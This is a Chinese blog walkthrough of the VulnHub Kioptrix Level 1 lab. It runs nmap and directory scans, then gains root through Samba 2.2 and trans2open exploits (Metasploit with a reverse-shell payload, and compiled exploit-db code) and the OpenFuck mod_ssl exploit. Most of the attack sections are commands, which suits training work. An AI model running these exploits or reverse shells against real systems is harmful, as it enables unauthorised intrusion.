freeBuf
主站

分类

漏洞 工具 极客 Web安全 系统安全 网络安全 无线安全 设备/客户端安全 数据安全 安全管理 企业安全 工控安全

特色

头条 人物志 活动 视频 观点 招聘 报告 资讯 区块链安全 标准与合规 容器安全 公开课

点我创作

试试在FreeBuf发布您的第一篇文章 让安全圈留下您的足迹
我知道了

官方公众号企业安全新浪微博

FreeBuf.COM网络安全行业门户,每日发布专业的安全资讯、技术剖析。

FreeBuf+小程序

FreeBuf+小程序

0

1

2

3

4

5

6

7

8

9

0

1

2

3

4

5

6

7

8

9

0

1

2

3

4

5

6

7

8

9

VulnHub KIOPTRIX LEVEL 1 (#1) 靶场渗透
8848 2021-09-01 01:04:05 153501

声明

本文仅供学习参考,其中涉及的一切资源均来源于网络,请勿用于任何非法行为,否则您将自行承担相应后果,我不承担任何法律及连带责任。

靶场信息

地址:https://www.vulnhub.com/entry/kioptrix-level-1-1,22/
发布日期:2010 年 2 月 17 日
难度:容易
目标:获取root shell

描述:This Kioptrix VM Image are easy challenges. The object of the game is to acquire root access via any means possible (except actually hacking the VM server or player). The purpose of these games are to learn the basic tools and techniques in vulnerability assessment and exploitation. There are more ways then one to successfully complete the challenges.

Source: http://www.kioptrix.com/blog/?page_id=135

Source: http://www.kioptrix.com/blog/?p=49

信息收集

1)确定目标

for i in {1..254}; do (ping -c 1 192.168.112.${i} | grep "bytes from" | grep -v "Unreachable" &); done;

得到ip地址:192.168.112.38

image-20210830225138477

2)端口扫描

nmap -v -T4 -p- -A -oN nmap.log 192.168.112.38

题目描述说不需要暴力,靶机又没有打开 SSH 端口。因此,我们必须想办法在目标上进行远程命令执行。我们需要把攻击方向放在web服务。

PORT     STATE SERVICE     VERSION
22/tcp   open  ssh         OpenSSH 2.9p2 (protocol 1.99)
| ssh-hostkey: 
|   1024 b8:74:6c:db:fd:8b:e6:66:e9:2a:2b:df:5e:6f:64:86 (RSA1)
|   1024 8f:8e:5b:81:ed:21:ab:c1:80:e1:57:a3:3c:85:c4:71 (DSA)
|_  1024 ed:4e:a9:4a:06:14:ff:15:14:ce:da:3a:80:db:e2:81 (RSA)
|_sshv1: Server supports SSHv1
80/tcp   open  http        Apache httpd 1.3.20 ((Unix)  (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b)
| http-methods: 
|   Supported Methods: GET HEAD OPTIONS TRACE
|_  Potentially risky methods: TRACE
|_http-server-header: Apache/1.3.20 (Unix)  (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b
|_http-title: Test Page for the Apache Web Server on Red Hat Linux
111/tcp  open  rpcbind     2 (RPC #100000)
| rpcinfo: 
|   program version    port/proto  service
|   100000  2            111/tcp   rpcbind
|   100000  2            111/udp   rpcbind
|   100024  1           1024/tcp   status
|_  100024  1           1024/udp   status
139/tcp  open  netbios-ssn Samba smbd (workgroup: MYGROUP)
443/tcp  open  ssl/https   Apache/1.3.20 (Unix)  (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b
| http-methods: 
|_  Supported Methods: GET HEAD POST
|_http-server-header: Apache/1.3.20 (Unix)  (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b
|_http-title: 400 Bad Request
| ssl-cert: Subject: commonName=localhost.localdomain/organizationName=SomeOrganization/stateOrProvinceName=SomeState/countryName=--
| Issuer: commonName=localhost.localdomain/organizationName=SomeOrganization/stateOrProvinceName=SomeState/countryName=--
| Public Key type: rsa
| Public Key bits: 1024
| Signature Algorithm: md5WithRSAEncryption
| Not valid before: 2009-09-26T09:32:06
| Not valid after:  2010-09-26T09:32:06
| MD5:   78ce 5293 4723 e7fe c28d 74ab 42d7 02f1
|_SHA-1: 9c42 91c3 bed2 a95b 983d 10ac f766 ecb9 8766 1d33
|_ssl-date: 2021-08-30T14:55:11+00:00; +1m50s from scanner time.
| sslv2: 
|   SSLv2 supported
|   ciphers: 
|     SSL2_DES_64_CBC_WITH_MD5
|     SSL2_RC2_128_CBC_EXPORT40_WITH_MD5
|     SSL2_RC4_128_EXPORT40_WITH_MD5
|     SSL2_RC4_128_WITH_MD5
|     SSL2_DES_192_EDE3_CBC_WITH_MD5
|     SSL2_RC4_64_WITH_MD5
|_    SSL2_RC2_128_CBC_WITH_MD5
1024/tcp open  status      1 (RPC #100024)
MAC Address: 00:0C:29:E4:90:7D (VMware)
Device type: general purpose
Running: Linux 2.4.X
OS CPE: cpe:/o:linux:linux_kernel:2.4
OS details: Linux 2.4.9 - 2.4.18 (likely embedded)
Uptime guess: 0.010 days (since Mon Aug 30 22:38:52 2021)
Network Distance: 1 hop
TCP Sequence Prediction: Difficulty=200 (Good luck!)
IP ID Sequence Generation: All zeros

3)目录扫描

dirsearch -u http://10.0.1.8

扫描到phpinfo信息和/tikiwiki

image-20210823140519994

漏洞利用

1)漏洞点1:Samba rce漏洞

msf的漏洞利用模块能够利用没有 noexec 堆栈选项集的 x86 Linux 系统上的缺陷。注意:一些旧版本的 RedHat 由于不允许匿名访问 IPC,所以不容易受到此攻击。

使用msfconsole扫描samba版本是2.2

use auxiliary/scanner/smb/smb_version
set RHOSTS 192.168.112.38
run

image-20210830233118257

使用searchsploit搜索可利用脚本

searchsploit samba 2.2
cp /usr/share/exploitdb/exploits/multiple/remote/10.c ./

image-20210830233304841

编译,运行

gcc 10.c -o exp
./exp -b 0 -v 192.168.112.38

image-20210830233418971

2)漏洞点2:call_trans2open(RBO)

(1)msf攻击

# 查找漏洞
search trans2open
use exploit/linux/samba/trans2open
# 配置漏洞利用选项
set RHOSTS 192.168.223.38
set LHOST 192.168.223.32
# 设置payload
set payload linux/x86/shell/reverse_tcp
或者
set payload linux/x86/shell_reverse_tcp
# 开始攻击
run

image-20210831233401584

(2)exp攻击

使用22469.c

searchsploit trans2open

image-20210901004439384

cp /usr/share/exploitdb/exploits/unix/remote/22469.c ./
gcc 22469.c -o exp
./exp -t 192.168.223.38

image-20210901004730782

3)漏洞点3:Apache mode_ssl

由于切换网络,ip现在是192.168.223.38,扫描路径

gobuster dir -u http://192.168.223.38/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x .php,.txt,.html,.zip

image-20210831224731694

./dirsearch -u http://192.168.223.38/

image-20210831224817557

http://192.168.223.38/manual/

image-20210831230746921

image-20210831230833424

mod_ssl version 2.8

安装OpenFuck

# 链接
https://github.com/heltonWernik/OpenLuck
# 下载
git clone https://github.com/heltonWernik/OpenFuck.git
# 安装 ssl-dev 库
apt-get install libssl-dev
# 编译
gcc -o OpenFuck OpenFuck.c -lcrypto
# 运行exp
./OpenFuck
# 攻击命令
./OpenFuck 0x6b 192.168.223.38 -c 40

image-20210901003139377

通过nmap的扫描结果得到

靶机是RedHat系列,Apache版本1.3.20

443/tcp  open  ssl/https   Apache/1.3.20 (Unix)  (Red-Hat/Linux) mod_ssl/2.8.4

image-20210901003230861

所以target值是0x6a或者0x6b,连接数目40-50

如果都无法成功攻击,显示如下,这应该是网络问题,看一下kali的ip地址是否正常,是否可以正常访问靶机。

image-20210901003430875

0x6a失败

image-20210901003928468

0x6b成功

./OpenFuck 0x6b 192.168.223.38 -c 40

image-20210901003955911

参考

https://github.com/isecurityplus/OSCP/blob/master/VulnHub/Kioptrix_1.md

https://netosec.com/kioptrix-level-1-vulnhub/

https://blog.csdn.net/weixin_44214107/article/details/102866431

镜像

链接:https://pan.baidu.com/s/1DXSedse8daZ0ynDCnSkMfg 
提取码:miss
# VulnHub # OSCP
免责声明
1.一般免责声明:本文所提供的技术信息仅供参考,不构成任何专业建议。读者应根据自身情况谨慎使用且应遵守《中华人民共和国网络安全法》,作者及发布平台不对因使用本文信息而导致的任何直接或间接责任或损失负责。
2. 适用性声明:文中技术内容可能不适用于所有情况或系统,在实际应用前请充分测试和评估。若因使用不当造成的任何问题,相关方不承担责任。
3. 更新声明:技术发展迅速,文章内容可能存在滞后性。读者需自行判断信息的时效性,因依据过时内容产生的后果,作者及发布平台不承担责任。
本文为 8848 独立观点,未经授权禁止转载。
如需授权、对文章有疑问或需删除稿件,请联系 FreeBuf 客服小蜜蜂(微信:freebee1024)
被以下专辑收录,发现更多精彩内容
+ 收入我的专辑
+ 加入我的收藏
VulnHub
8848 LV.5
alert('1')
  • 40 文章数
  • 142 关注者
新款信息收集神器:0.zone
2022-05-25
upload-labs二次渲染之png写入PLTE 数据块
2021-12-16
GitLab 远程命令执行漏洞复现(CVE-2021-22205)
2021-11-02
文章目录